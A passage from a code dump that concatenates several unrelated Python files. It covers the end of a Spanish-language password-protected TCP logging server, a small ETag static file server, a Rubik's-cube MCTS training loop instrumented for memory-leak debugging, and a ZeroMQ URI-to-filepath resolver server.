fecha_hora = datetime.datetime.now().strftime('%d-%m-%Y %H:%M:%S')
print(f"{self.client_address[0]},{fecha_hora},{data}")
f.write(f"{self.client_address[0]},{fecha_hora},{data}")
f.close()
global_lock.release()
cur_thread = threading.current_thread()
response = bytes("Datos obtenidos", 'utf-8')
self.request.sendall(response)
else:
response = bytes("Nop!", 'utf-8')
self.request.sendall(response)
except:
response = bytes("Error en procesamiento de datos", 'utf-8')
self.request.sendall(response)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == "__main__":
password=""
if(len(sys.argv)<4):
print("[!] Favor proveer IP, Puerto y clave.")
print("Ejemplo:")
print(f"python {sys.argv[0].split('/')[-1]} 127.0.0.1 443 password\n")
exit(1)
else:
print("\n")
HOST = sys.argv[1]
PORT = int(sys.argv[2])
try:
password = sys.argv[3]
print("[+] Password seteada!")
except:
password = ''
print("[!] Servicio sin password!, muy peligroso y mala idea!")
try:
print(f"[+] Levantando el servidor: {HOST}:{PORT}...", end="")
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
try:
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("OK")
print("[+] Server esperando peticiones!")
server_thread.join()
except Exception as err:
print(err)
finally:
server.shutdown()
server.server_close()
except KeyboardInterrupt as ke:
print("Bye!")
except Exception as e:
print(e)
exit(1)
|
httpd.py
|
import hashlib
import os
import threading
try:
from http.server import HTTPServer, SimpleHTTPRequestHandler
except ImportError:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class ETagHandler(SimpleHTTPRequestHandler):
def end_headers(self):
file = self.translate_path(self.path)
if not os.path.isdir(file) and os.path.exists(file):
with open(file, 'r') as fd:
etag = hashlib.md5(fd.read().encode('utf8')).hexdigest()
self.send_header('ETag', etag)
SimpleHTTPRequestHandler.end_headers(self)
class StaticFileServer():
def __init__(self):
self.httpd = HTTPServer(('localhost', 8000), ETagHandler)
def __enter__(self):
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def __exit__(self, *args):
self.httpd.shutdown()
self.httpd.server_close()
|
train_develop_memory_leak.py
|
"""
End to end training of my neural network model.
The training routine has three key phases
- Evaluation through MCTS
- Data generation through MCTS
- Neural network training
"""
import numpy as np
from collections import defaultdict, deque, Counter, namedtuple
import itertools
import warnings
import os, psutil # useful for memory management
from datetime import datetime
from mcts_nn_cube import State, MCTSAgent
import objgraph
import pympler
from pympler import muppy
from pympler import summary
from pympler import tracker
tr = tracker.SummaryTracker()
from pprint import pprint
import gc
# this keeps track of the training runs, including the older versions that we are extending
VERSIONS = ["v0.9.3.memory_leak"]
# memory management
MY_PROCESS = psutil.Process(os.getpid())
def memory_used():
return MY_PROCESS.memory_info().rss
def str_between(s, start, end):
return (s.split(start))[1].split(end)[0]
class GameAgent():
def __init__(self, game_id):
self.game_id = game_id
self.self_play_stats=defaultdict(list)
self.game_stats=defaultdict(list)
self.data_states = []
self.data_policies = []
self.data_values = []
self.counter=0
self.done=False
self.win=False
# can attach other attributes as needed
class BatchGameAgent():
"""
Handles the steps of the games, including batch games.
"""
def __init__(self, model, max_steps, max_depth, max_game_length, transposition_table, decay, exploration):
self.game_agents = deque()
self.model = model
self.max_depth = max_depth
self.max_steps = max_steps
self.max_game_length = max_game_length
self.transposition_table = transposition_table
self.exploration = exploration
self.decay = decay
def is_empty(self):
return not bool(self.game_agents)
def append_states(self, state_info_iter):
for game_id, state, distance, distance_level in state_info_iter:
mcts = MCTSAgent(self.model.function,
state.copy(),
max_depth = self.max_depth,
transposition_table = self.transposition_table.copy(),
c_puct = self.exploration,
gamma = self.decay)
game_agent = GameAgent(game_id)
game_agent.mcts = mcts
game_agent.distance = distance
game_agent.distance_level = distance_level
self.game_agents.append(game_agent)
def run_game_agent_one_step(self, game_agent):
mcts = game_agent.mcts
mcts.search(steps=self.max_steps)
# reduce the max batch size to prevent the worker from blocking
self.model.set_max_batch_size(self.model.get_max_batch_size() - 1)
def process_completed_step(self, game_agent):
mcts = game_agent.mcts
# find next state
probs = mcts.action_probabilities(inv_temp = 10)
action = np.argmax(probs)
#action = np.random.choice(12, p=probs)
shortest_path = game_agent.mcts.stats('shortest_path')
# record stats
game_agent.self_play_stats['_game_id'].append(game_agent.game_id)
game_agent.self_play_stats['_step_id'].append(game_agent.counter)
game_agent.self_play_stats['shortest_path'].append(shortest_path)
game_agent.self_play_stats['action'].append(action)
game_agent.self_play_stats['value'].append(mcts.stats('value'))
game_agent.self_play_stats['prior'].append(mcts.stats('prior'))
game_agent.self_play_stats['prior_dirichlet'].append(mcts.stats('prior_dirichlet'))
game_agent.self_play_stats['visit_counts'].append(mcts.stats('visit_counts'))
game_agent.self_play_stats['total_action_values'].append(mcts.stats('total_action_values'))
# training data (also recorded in stats)
game_agent.data_states.append(mcts.initial_node.state.input_array_no_history())
policy = mcts.action_probabilities(inv_temp = 10)
game_agent.data_policies.append(policy)
game_agent.self_play_stats['updated_policy'].append(policy)
game_agent.data_values.append(0) # updated if game is success
game_agent.self_play_stats['updated_value'].append(0)
# prepare for next state
game_agent.counter += 1
#if shortest_path < 0:
# print("(DB) no path")
if (game_agent.counter > 1 and shortest_path < 0) or game_agent.counter >= self.max_game_length:
game_agent.win = False
game_agent.done = True
else:
mcts.advance_to_action(action)
if mcts.is_terminal():
game_agent.win = True
game_agent.done = True
def run_one_step_with_threading(self):
import threading
# start threads
self.model.set_max_batch_size(len(self.game_agents))
threads = []
for game_agent in self.game_agents:
t = threading.Thread(target=self.run_game_agent_one_step, args=(game_agent, ))
t.start()
threads.append(t)
# wait for threads to finish
for t in threads:
t.join()
for game_agent in self.game_agents:
self.process_completed_step(game_agent)
def run_one_step(self):
for game_agent in self.game_agents:
mcts = game_agent.mcts
mcts.search(steps=self.max_steps)
self.process_completed_step(game_agent)
def finished_game_results(self):
for _ in range(len(self.game_agents)):
game_agent = self.game_agents.popleft()
if not game_agent.done:
self.game_agents.append(game_agent)
else:
if game_agent.win:
value = 1
for i in range(game_agent.counter):
value *= self.decay
game_agent.data_values[-(i+1)] = value
game_agent.self_play_stats['updated_value'][-(i+1)] = value
# record game stats
game_agent.game_stats['_game_id'].append(game_agent.game_id)
game_agent.game_stats['distance_level'].append(game_agent.distance_level)
game_agent.game_stats['training_distance'].append(game_agent.distance)
game_agent.game_stats['max_game_length'].append(self.max_game_length)
game_agent.game_stats['win'].append(game_agent.win)
game_agent.game_stats['total_steps'].append(game_agent.counter if game_agent.win else -1)
yield game_agent
class TrainingAgent():
"""
This agent handles all the details of the training.
"""
def __init__(self):
import models
# Threading
self.multithreaded = True
# Model (NN) parameters (fixed)
self.prev_state_history = 8 # the number of previous states (including the current one) used as input to the model
self.checkpoint_model = models.ConvModel2D3D(history=self.prev_state_history) # this doesn't build and/or load the model yet
self.best_model = models.ConvModel2D3D(history=self.prev_state_history) # this doesn't build and/or load the model yet
if self.multithreaded:
self.checkpoint_model.multithreaded = True
self.best_model.multithreaded = True
self.learning_rate = .001
# MCTS parameters (fixed)
self.max_depth = 900
self.max_steps = 1600
self.use_prebuilt_transposition_table = False
self.decay = 0.95 # gamma
self.exploration = 1. #c_puct
self.prebuilt_transposition_table = None # built later
# Validation flags
self.validate_training_data = True
# Training parameters (fixed)
self.batch_size = 32
self.games_per_generation = 4#512
self.starting_distance = 1
self.min_distance = 1
self.win_rate_target = .5
self.max_game_length = 100
self.prev_generations_used_for_training = 8
self.training_sample_ratio = 1/self.prev_generations_used_for_training
self.games_per_evaluation = 2#128
# Training parameters preserved between generations
self.training_distance_level = float(self.starting_distance)
self.recent_wins = Counter()
self.recent_games = Counter()
self.checkpoint_training_distance_level = float(self.starting_distance)
self.checkpoint_recent_wins = Counter()
self.checkpoint_recent_games = Counter()
# Training parameters (dynamic)
self.game_number = 0
self.self_play_start = None # date and time (utc)
self.self_play_end = None
self.training_start = None
self.training_end = None
# Evaluation parameters (dynamic)
self.generation = 0
self.best_generation = 0
# Self play stats
# These are functionally data tables implemented as a dictionary of lists
# The keys are the column names. This makes it easy to change the stats I am recording.
self.self_play_stats = defaultdict(list)
self.game_stats = defaultdict(list)
self.training_stats = defaultdict(list)
self.generation_stats = defaultdict(list)
# Training data
self.training_data_states = []
self.training_data_policies = []
self.training_data_values = []
def build_models(self):
"""
Builds both checkpoint and best model
May be overwritten later by loaded weights
"""
self.checkpoint_model.build()
self.best_model.build()
def load_transposition_table(self):
#TODO: Add this. For now, just use empty table.
warnings.warn("load_transposition_table is not properly implemented", stacklevel=2)
self.prebuilt_transposition_table = {}
def load_models(self):
"""
Finds the checkpoint model and the best model in the given naming scheme
and loads those
"""
import os
# load checkpoint model
for version in VERSIONS:
model_files = [f for f in os.listdir('./save/')
if f.startswith("checkpoint_model_{}_gen".format(version))
and f.endswith(".h5")]
if model_files:
# choose newest generation
model_file = max(model_files,
key=lambda f: str_between(f, "_gen", ".h5"))
path = "./save/" + model_file
print("checkpoint model found:", "'" + path + "'")
print("loading model ...")
self.checkpoint_model.load_from_file(path)
self.generation = int(str_between(path, "_gen", ".h5"))
break
else:
print("no checkpoint model found with version {}".format(version))
print("generation set to", self.generation)
# load best model
for version in VERSIONS:
model_files = [f for f in os.listdir('./save/')
if f.startswith("model_{}_gen".format(version))
and f.endswith(".h5")]
if model_files:
# choose newest generation
model_file = max(model_files,
key=lambda f: (str_between(f, "_gen", ".h5")))
path = "./save/" + model_file
print("best model found:", "'" + path + "'")
print("loading model ...")
self.best_model.load_from_file(path)
self.best_generation = int(str_between(path, "_gen", ".h5"))
break
else:
print("no best model found with version {}".format(version))
print("best generation:", self.best_generation)
def save_checkpoint_model(self):
file_name = "checkpoint_model_{}_gen{:03}.h5".format(VERSIONS[0], self.generation)
path = "./save/" + file_name
self.checkpoint_model.save_to_file(path)
print("saved model checkpoint:", "'" + path + "'")
self.checkpoint_training_distance_level = self.training_distance_level
self.checkpoint_recent_wins = Counter()
self.checkpoint_recent_games = Counter()
# add a few free wins to speed up the convergence
for dist in range(int(self.training_distance_level) + 1):
self.checkpoint_recent_games[dist] += 1
self.checkpoint_recent_wins[dist] += 1
def save_and_set_best_model(self):
file_name = "model_{}_gen{:03}.h5".format(VERSIONS[0], self.generation)
path = "./save/" + file_name
self.checkpoint_model.save_to_file(path)
print("saved model:", "'" + path + "'")
self.best_model.load_from_file(path)
self.best_generation = self.generation
self.training_distance_level = self.checkpoint_training_distance_level
self.recent_wins = self.checkpoint_recent_wins
self.recent_games = self.checkpoint_recent_games
def train_model(self):
import os
import h5py
inputs_list = []
outputs_policy_list = []
outputs_value_list = []
counter = 0
for version in VERSIONS:
if counter > self.prev_generations_used_for_training:
break
data_files = [(str_between(f, "_gen", ".h5"), f)
for f in os.listdir('./save/')
if f.startswith("data_{}_gen".format(version))
and f.endswith(".h5")]
# go through in reverse order
for gen, f in reversed(sorted(data_files)):
if counter > self.prev_generations_used_for_training:
break
path = "./save/" + f
print("loading data:", "'" + path + "'")
with h5py.File(path, 'r') as hf:
inputs_list.append(hf['inputs'][:])
outputs_policy_list.append(hf['outputs_policy'][:])
outputs_value_list.append(hf['outputs_value'][:])
counter += 1
inputs_all = np.concatenate(inputs_list, axis=0)
outputs_policy_all = np.concatenate(outputs_policy_list, axis=0)
outputs_value_all = np.concatenate(outputs_value_list, axis=0)
if self.validate_training_data:
print("validating data...")
self.checkpoint_model.validate_data(inputs_all, outputs_policy_all, outputs_value_all, gamma=self.decay)
self.validate_training_data = False # just validate for first round
print("data valid.")
print("processing...")
inputs_all, outputs_policy_all, outputs_value_all = \
self.checkpoint_model.process_training_data(inputs_all, outputs_policy_all, outputs_value_all, augment=True)
n = len(inputs_all)
sample_size = int((n * self.training_sample_ratio) // 32 + 1) * 32 # roughly self.training_sample_ratio % of samples
sample_idx = np.random.choice(n, size=sample_size)
inputs = inputs_all[sample_idx]
outputs_policy = outputs_policy_all[sample_idx]
outputs_value = outputs_value_all[sample_idx]
print("training...")
self.checkpoint_model.train_on_data([inputs, outputs_policy, outputs_value])
def reset_self_play(self):
# Training parameters (dynamic)
self.game_number = 0
self.self_play_start = None # date and time (utc)
self.self_play_end = None
self.training_start = None
self.training_end = None
# Self play stats
self.self_play_stats = defaultdict(list)
self.game_stats = defaultdict(list)
self.generation_stats = defaultdict(list)
# Training data (one item per game based on randomly chosen game state)
self.training_data_states = []
self.training_data_policies = []
self.training_data_values = []
# set start time
self.self_play_start = datetime.utcnow() # date and time (utc)
def save_training_stats(self):
import pandas as pd
file_name = "stats_{}_gen{:03}.h5".format(VERSIONS[0], self.generation)
path = "./save/" + file_name
# record time of end of self-play
self.self_play_end = datetime.utcnow()
# save generation_stats data
self.generation_stats['_generation'].append(self.generation)
self.generation_stats['best_model_generation'].append(self.best_generation)
self.generation_stats['distance_level'].append(self.training_distance_level)
self.generation_stats['memory_usage'].append(memory_used())
self.generation_stats['version_history'].append(",".join(VERSIONS))
self.generation_stats['self_play_start_datetime_utc'].append(str(self.self_play_start))
self.generation_stats['self_play_end_datetime_utc'].append(str(self.self_play_end))
self.generation_stats['self_play_time_sec'].append((self.self_play_end - self.self_play_start).total_seconds())
generation_stats_df = pd.DataFrame(data=self.generation_stats)
generation_stats_df.to_hdf(path, 'generation_stats', mode='a', format='fixed') #use mode='a' to avoid overwriting
# save game_stats data
game_stats_df = pd.DataFrame(data=self.game_stats)
game_stats_df.to_hdf(path, 'game_stats', mode='a', format='fixed')
# save self_play_stats data
self_play_stats_df = pd.DataFrame(data=self.self_play_stats)
self_play_stats_df.to_hdf(path, 'self_play_stats', mode='a', format='fixed') #use mode='a' to avoid overwriting
print("saved stats:", "'" + path + "'")
def save_training_data(self):
# save training_data
import h5py
file_name = "data_{}_gen{:03}.h5".format(VERSIONS[0], self.generation)
path = "./save/" + file_name
inputs, outputs_policy, outputs_value = \
self.best_model.preprocess_training_data(self.training_data_states,
self.training_data_policies,
self.training_data_values)
if self.validate_training_data:
print("validating data...")
self.best_model.validate_data(inputs, outputs_policy, outputs_value, gamma=self.decay)
print("data valid.")
with h5py.File(path, 'w') as hf:
hf.create_dataset("inputs", data=inputs)
hf.create_dataset("outputs_policy", data=outputs_policy)
hf.create_dataset("outputs_value", data=outputs_value)
print("saved data:", "'" + path + "'")
@staticmethod
def random_state(distance, history):
state = State(history = history)
while state.done():
state.reset_and_randomize(distance)
return state
@staticmethod
def random_distance(distance_level):
lower_dist = int(distance_level)
prob_of_increase = distance_level - lower_dist
distance = lower_dist + np.random.choice(2, p=[1-prob_of_increase, prob_of_increase])
return distance
def update_win_and_level(self, distance, win, checkpoint=False):
if checkpoint:
training_distance_level = self.checkpoint_training_distance_level
recent_wins = self.checkpoint_recent_wins
recent_games = self.checkpoint_recent_games
else:
training_distance_level = self.training_distance_level
recent_wins = self.recent_wins
recent_games = self.recent_games
# update wins/loses
recent_wins[distance] += win
recent_games[distance] += 1
# update difficulty
upper_dist = 0
while True:
upper_dist += 1
if recent_wins[upper_dist] <= self.win_rate_target * recent_games[upper_dist]:
break
if upper_dist <= self.min_distance:
training_distance_level = float(self.min_distance)
else:
lower_dist = upper_dist - 1
lower_dist_win_rate = (.99 * self.win_rate_target) if recent_games[lower_dist] == 0 \
else recent_wins[lower_dist] / recent_games[lower_dist]
upper_dist_win_rate = (.99 * self.win_rate_target) if recent_games[lower_dist+1] == 0 \
else recent_wins[lower_dist+1] / recent_games[lower_dist+1]
# notice that we won't divide by zero here since upper_dist_win_rate < lower_dist_win_rate
training_distance_level = lower_dist + (lower_dist_win_rate - self.win_rate_target) / (lower_dist_win_rate - upper_dist_win_rate)
if checkpoint:
self.checkpoint_training_distance_level = training_distance_level
else:
self.training_distance_level = training_distance_level
def print_game_stats(self, game_results):
game_id = game_results.game_id
distance = game_results.distance
level = game_results.distance_level
win = game_results.win
steps = game_results.game_stats['total_steps'][0]
lost_way = game_results.self_play_stats['shortest_path'][0] < 0
print("\nGame {}/{}".format(game_id, self.games_per_generation))
print("distance: {} (level: {:.2f})".format(distance, level))
if win:
print("win ({}{} steps)".format(steps, "*" if lost_way else ""))
else:
print("loss")
print()
new_level = self.training_distance_level
lower_dist = int(new_level)
lower_dist_win_rate = float('nan') if self.recent_games[lower_dist] == 0 else self.recent_wins[lower_dist] / self.recent_games[lower_dist]
upper_dist_win_rate = float('nan') if self.recent_games[lower_dist+1] == 0 else self.recent_wins[lower_dist+1] / self.recent_games[lower_dist+1]
print("(DB) new level: {:.2f}, win rates: {}: {:.2f} {}: {:.2f}".format(new_level, lower_dist, lower_dist_win_rate, lower_dist+1, upper_dist_win_rate))
print(end="", flush=True) # force stdout to flush (fixes buffering issues)
def print_eval_game_stats(self, game_results1, game_results2, current_scores):
game_id1 = game_results1.game_id
game_id2 = game_results2.game_id
distance1 = game_results1.distance
distance2 = game_results2.distance
level1 = game_results1.distance_level
level2 = game_results2.distance_level
win1 = game_results1.win
win2 = game_results2.win
steps1 = game_results1.game_stats['total_steps'][0]
steps2 = game_results2.game_stats['total_steps'][0]
lost_way1 = game_results1.self_play_stats['shortest_path'][0] < 0
lost_way2 = game_results2.self_play_stats['shortest_path'][0] < 0
assert game_id1 == game_id2
assert distance1 == distance2
print("\nEvaluation Game {}/{}".format(game_id1, self.games_per_evaluation))
print("distance: {} (levels: {:.2f} {:.2f})".format(distance1, level1, level2))
if win1:
print("best model: win ({}{} steps)".format(steps1, "*" if lost_way1 else ""))
else:
print("best model: loss")
if win2:
print("checkpoint model: win ({}{} steps)".format(steps2, "*" if lost_way2 else ""))
else:
print("checkpoint model: loss")
print()
new_level = self.training_distance_level
recent_games = self.recent_games
recent_wins = self.recent_wins
lower_dist = int(new_level)
lower_dist_win_rate = float('nan') if recent_games[lower_dist] == 0 else recent_wins[lower_dist] / recent_games[lower_dist]
upper_dist_win_rate = float('nan') if recent_games[lower_dist+1] == 0 else recent_wins[lower_dist+1] / recent_games[lower_dist+1]
print("(DB) best model new level: {:.2f}, win rates: {}: {:.2f} {}: {:.2f}".format(new_level, lower_dist, lower_dist_win_rate, lower_dist+1, upper_dist_win_rate))
new_level = self.checkpoint_training_distance_level
recent_games = self.checkpoint_recent_games
recent_wins = self.checkpoint_recent_wins
lower_dist = int(new_level)
lower_dist_win_rate = float('nan') if recent_games[lower_dist] == 0 else recent_wins[lower_dist] / recent_games[lower_dist]
upper_dist_win_rate = float('nan') if recent_games[lower_dist+1] == 0 else recent_wins[lower_dist+1] / recent_games[lower_dist+1]
print("(DB) checkpoint new level: {:.2f}, win rates: {}: {:.2f} {}: {:.2f}".format(new_level, lower_dist, lower_dist_win_rate, lower_dist+1, upper_dist_win_rate))
print(end="", flush=True) # force stdout to flush (fixes buffering issues)
def state_generator(self, max_game_id, evaluation=False):
while self.game_number < max_game_id:
if evaluation:
distance_level = max(self.training_distance_level, self.checkpoint_training_distance_level)
else:
distance_level = self.training_distance_level
distance = self.random_distance(distance_level)
state = self.random_state(distance, self.prev_state_history)
print("(DB)", "starting game", self.game_number, "...")
yield self.game_number, state, distance, distance_level
self.game_number += 1
def game_generator(self, model, state_generator, max_batch_size, return_in_order):
"""
Send games to the batch game agent and retrieve the finished games.
Yield the finished games in consecutive order of their id.
"""
import heapq
finished_games = [] # priority queue
batch_game_agent = BatchGameAgent(model=model,
max_steps=self.max_steps,
max_depth=self.max_depth,
max_game_length=self.max_game_length,
transposition_table=self.prebuilt_transposition_table,
decay=self.decay,
exploration=self.exploration)
# scale batch size up to make for better beginning determination of distance level
# use batch size of 1 for first 16 games
batch_size = 1
cnt = 16
# attach inital batch
first_batch = list(itertools.islice(state_generator, batch_size))
if not first_batch:
return
batch_game_agent.append_states(first_batch)
next_game_id = first_batch[0][0] # game_id is first element
# loop until all done
while not batch_game_agent.is_empty():
if self.multithreaded:
batch_game_agent.run_one_step_with_threading()
else:
batch_game_agent.run_one_step()
# collect all finished games
for game_results in batch_game_agent.finished_game_results():
heapq.heappush(finished_games, (game_results.game_id, game_results))
# check if available slots
if len(batch_game_agent.game_agents) < batch_size:
# increment batch size
cnt -= 1
if cnt < 0:
batch_size = max_batch_size
if return_in_order:
# return those which are next in order
if not finished_games or finished_games[0][1].game_id != next_game_id:
print("(DB)", "waiting on game", next_game_id, "(finished games:", ",".join(str(g[1].game_id) for g in finished_games), ") ...")
while finished_games and finished_games[0][1].game_id == next_game_id:
yield heapq.heappop(finished_games)[1]
next_game_id += 1
else:
# return in order they are finished
if not finished_games:
print("(DB) ...")
while finished_games:
yield heapq.heappop(finished_games)[1]
# fill up the batch (do after yields to ensure that self.training_distance_level is updated)
available_slots = batch_size - len(batch_game_agent.game_agents)
replacement_batch = itertools.islice(state_generator, available_slots)
batch_game_agent.append_states(replacement_batch)
def generate_data_self_play(self):
# don't reset self_play since using the evaluation results to also get data
#self.reset_self_play()
for game_results in self.game_generator(self.best_model, self.state_generator(self.games_per_generation), max_batch_size=self.batch_size, return_in_order=False):
# update data
for k, v in game_results.self_play_stats.items():
self.self_play_stats[k] += v
for k, v in game_results.game_stats.items():
self.game_stats[k] += v
self.training_data_states += game_results.data_states
self.training_data_policies += game_results.data_policies
self.training_data_values += game_results.data_values
# update win rates and level
self.update_win_and_level(game_results.distance, game_results.win)
# Print details
self.print_game_stats(game_results)
def evaluate_and_choose_best_model(self):
self.reset_self_play()
state_generator1, state_generator2 = itertools.tee(self.state_generator(self.games_per_evaluation, evaluation=True))
best_model_wins = 0
checkpoint_model_wins = 0
ties = 0
for game_results1, game_results2 \
in zip(self.game_generator(self.best_model, state_generator1, max_batch_size=self.batch_size, return_in_order=True),
self.game_generator(self.checkpoint_model, state_generator2, max_batch_size=self.batch_size, return_in_order=True)):
if game_results1.win > game_results2.win:
best_model_wins += 1
game_results = game_results1
elif game_results1.win < game_results2.win:
checkpoint_model_wins += 1
game_results = game_results2
else:
ties += 1
game_results = game_results1
# update data
for k, v in game_results.self_play_stats.items():
self.self_play_stats[k] += v
for k, v in game_results.game_stats.items():
self.game_stats[k] += v
self.training_data_states += game_results.data_states
self.training_data_policies += game_results.data_policies
self.training_data_values += game_results.data_values
# update win rates and level
self.update_win_and_level(game_results1.distance, game_results1.win)
self.update_win_and_level(game_results2.distance, game_results2.win, checkpoint=True)
# Print details
self.print_eval_game_stats(game_results1, game_results2, [best_model_wins, checkpoint_model_wins, ties])
print("\nEvaluation results (win/lose/tie)")
print("Best model : {:2} / {:2} / {:2}".format(best_model_wins, checkpoint_model_wins, ties))
print("Checkpoint model: {:2} / {:2} / {:2}".format(checkpoint_model_wins, best_model_wins, ties))
if checkpoint_model_wins - best_model_wins > 5:
print("\nCheckpoint model is better.")
print("\nSave and set as best model...")
self.save_and_set_best_model()
else:
print("\nCurrent best model is still the best.")
def main():
agent = TrainingAgent()
print("Build models...")
agent.build_models()
print("\nLoad pre-built transposition table...")
agent.load_transposition_table()
print("\nLoad models (if any)...")
agent.load_models()
print("\nBegin training loop...")
agent.reset_self_play()
tr.print_diff()
while True:
gc.collect()
print("BBB1", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nBegin self-play data generation...")
agent.generate_data_self_play()
gc.collect()
print("BBB2", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nSave stats...")
agent.save_training_stats()
gc.collect()
print("BBB3", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nSave data...")
agent.save_training_data()
agent.generation += 1
gc.collect()
print("BBB4", "objgraph stuff")
objgraph.show_growth(limit=50)
tr.print_diff()
"""
print()
for typename in sorted(['MCTSAgent', 'GameAgent', 'BatchAgent', 'TrainingAgent', 'BatchCube', 'State', 'MCTSNode', 'ConvModel2D3D', 'Task', 'BaseModel']):
cnt = objgraph.count(typename=typename)
print(typename, cnt)
if cnt:
obj = objgraph.by_type(typename=typename)[-1]
chain = objgraph.find_backref_chain(obj, predicate=lambda x: x is agent)
chain_types = [type(x) for x in chain]
pprint(chain_types)
#objgraph.show_refs([agent], filename='sample-graph'+str(agent.generation)+'.png')
"""
print("\nTrain model...")
agent.train_model()
gc.collect()
print("BBB5", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nSave model...")
agent.save_checkpoint_model()
gc.collect()
print("BBB5", "objgraph stuff")
objgraph.show_growth(limit=50)
print("\nBegin evaluation...")
agent.evaluate_and_choose_best_model()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print("\nExiting the program...\nGood bye!")
finally:
pass
|
turret-server.py
|
#
# Copyright 2019 University of Technology, Sydney
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# * The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import os
import time
import logging
import sys
import threading
import traceback
import tempfile
from optparse import OptionParser
import zmq
from turret import resolver
TURRET_LOG_LOCATION = tempfile.mkdtemp(suffix='_turret_log')
ZMQ_WORKERS = 16
ZMQ_PORT = 5555
ZMQ_URL = "tcp://*:%s" % ZMQ_PORT
SERVER_RUNNING = False
WORKER_URL = "inproc://workers"
SHOULD_LOG = True
DEBUG_LOG = False
LOGGER = None
class turret_server_exception(Exception):
"""
"""
pass
def get_logger():
"""
Returns:
Python logger
"""
try:
os.makedirs(TURRET_LOG_LOCATION)
except OSError:
pass
localtime = time.localtime()
log_prefix = time.strftime('%d_%b_%Y_%H_%M_%S', localtime)
log_path = '%s/%s_turretServer.log' % (TURRET_LOG_LOCATION, log_prefix)
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger('turret-server')
logger.setLevel(logging.INFO)
handler = logging.FileHandler(log_path)
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(formatter)
logger.addHandler(console)
return logger
def process_socket(a_socket, workerIdx=0):
"""
Args:
a_socket:
workerIdx:
Returns:
None
Raises:
turret_server_exception
"""
# Wait until worker has message to resolve
while True:
try:
message = a_socket.recv()
except zmq.ZMQError, e:
if e.errno == zmq.EAGAIN:
pass
else:
raise e
else:
filepath = ""
if "KILL" in message:
a_socket.send("RECEIVED")
raise turret_server_exception("Server received kill instruction")
for retry in range(0, 10):
try:
filepath = resolver.uri_to_filepath(message)
if filepath == None:
continue
break
except Exception as e:
filepath = ''
LOGGER.info(str(e))
continue
# Send back resolved path
filepath += '\0'
a_socket.send(filepath)
LOGGER.info("received: %s\nsent: %s\n" % (message, filepath))
def worker_handle(workerURL, workerIdx, context=None):
"""
Args:
workerURL:
workerIdx:
context:
Returns:
"""
# Get ref to specified context
context = context or zmq.Context.instance()
# Socket to talk to dispatcher
socket = context.socket(zmq.REP)
socket.connect(workerURL)
LOGGER.info("Started worker thread")
try:
while True:
process_socket(socket, workerIdx)
except turret_server_exception as e:
raise e
except Exception as e:
LOGGER.info("Caught exception: [%s]" % e)
LOGGER.info(traceback.format_exc())
raise
LOGGER.info("Caught exception: [%s]" % e)
LOGGER.info(traceback.format_exc())
LOGGER.info("Worker thread has stopped")
def worker_routine(workerURL, workerIdx, context=None):
"""
Args:
workerURL:
workerIdx:
context:
Returns:
"""
while True:
worker_handle(workerURL, workerIdx, context)
def launch_threaded_server():
"""
Returns:
"""
LOGGER.info("Launching threaded server")
# Create ZMQ context
context = zmq.Context.instance()
# Socket to talk to resolver clients
try:
clients = context.socket(zmq.ROUTER)
clients.bind(ZMQ_URL)
# Socket to talk to workers
workers = context.socket(zmq.DEALER)
workers.bind(WORKER_URL)
# Launch pool of workers
for i in range(ZMQ_WORKERS):
thread = threading.Thread(target=worker_routine, args=(WORKER_URL, i,))
thread.start()
LOGGER.info("Open server with %s workers." % ZMQ_WORKERS)
# Link clients and workers
zmq.proxy(clients, workers)
except zmq.error.ZMQError:
# Debug Log
raise turret_server_exception("ZMQ Server address already in use.")
# Early exit, address already in use
return
except turret_server_exception as e:
print "pepe"
# Cleanup
clients.close()
workers.close()
context.term()
LOGGER.info("Closed server.")
raise turret_server_exception(e)
except KeyboardInterrupt:
# Cleanup
clients.close()
workers.close()
context.term()
LOGGER.info("Closed server.")
raise turret_server_exception("Keyboard has interrupted server.")
def launch_simple_server():
"""
Returns:
"""
LOGGER.info("Launching simple server")
# Create ZMQ context
context = zmq.Context()
context.setsockopt(zmq.RCVHWM, 5000000)
context.setsockopt(zmq.SNDHWM, 5000000)
context.setsockopt(zmq.SNDTIMEO, 50000)
context.setsockopt(zmq.RCVTIMEO, 50000)
while True:
socket = context.socket(zmq.REP)
try:
socket.bind(ZMQ_URL)
except zmq.error.ZMQError:
raise turret_server_exception("ZMQ Server address already in use.")
# Listen for client requests
try:
process_socket(socket)
except KeyboardInterrupt:
raise turret_server_exception("Keyboard has interrupted server.")
except turret_server_exception as e:
raise turret_server_exception(e)
except Exception as e:
print("Caught exception:", e)
finally:
socket.unbind(ZMQ_URL)
socket.close()
